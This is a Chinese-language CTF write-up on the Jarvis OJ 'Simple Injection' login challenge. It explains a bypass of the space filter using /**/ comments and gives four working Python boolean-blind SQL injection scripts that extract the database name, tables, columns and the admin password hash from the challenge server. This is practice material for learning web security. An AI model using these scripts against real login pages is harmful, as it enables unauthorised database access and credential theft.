Jarvis OJ Simple Injection

Jarvis OJ Simple Injection

题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,胡乱输入其他的是用户名错误,让后 1‘ or ‘1可以,但是1’ or 1#却不行,1‘/**/or/**/1#也可以。所以应该是过滤了空格,其他的都没过滤。

让后就想到了实验吧的一道题,
附上题目连接:http://ctf5.shiyanbar.com/web/pcat/index.php 和我写的题解
“因缺思汀的绕过”
试了一下,发现不行。于是开始盲注。
附上脚本:
爆数据库

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr(database(),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if(mid==1):
        break
    result+=chr(mid)
    print(result)
print("database:",result)
#database: injection

爆表名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result,mid)
print("table_name:",result)
#table_name: admin

字段名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("column_name:",result)
#column_name: id,username,password

password

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("password:",result)
#password: 334cfb59c9d74849801d5acdcfdaadc3
上一篇:mysql索引


下一篇:gtest工程